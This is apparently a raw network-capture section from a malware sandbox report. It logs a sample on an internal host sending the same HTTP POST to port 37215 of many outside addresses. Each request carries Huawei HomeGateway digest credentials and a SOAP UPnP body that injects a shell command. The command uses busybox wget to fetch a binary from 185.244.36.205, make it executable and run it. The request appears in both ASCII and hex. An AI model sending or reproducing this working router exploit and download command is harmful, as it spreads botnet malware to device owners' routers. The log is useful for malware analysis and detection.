                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1363192.168.2.1552114102.216.125.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399189949 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1364192.168.2.155916637.139.135.21537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399230003 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1365192.168.2.1554380102.216.221.23537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399240971 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1366192.168.2.1546774190.15.140.23237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399251938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1367192.168.2.155163045.82.136.2037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399283886 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1368192.168.2.1558912222.107.93.18337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399287939 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1369192.168.2.1543770197.255.110.21037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399298906 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1370192.168.2.155539294.88.50.2337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399312973 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1371192.168.2.1546070181.102.125.037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399358988 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1372192.168.2.1559638222.11.100.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399360895 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1373192.168.2.153562473.137.99.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:18.399369955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
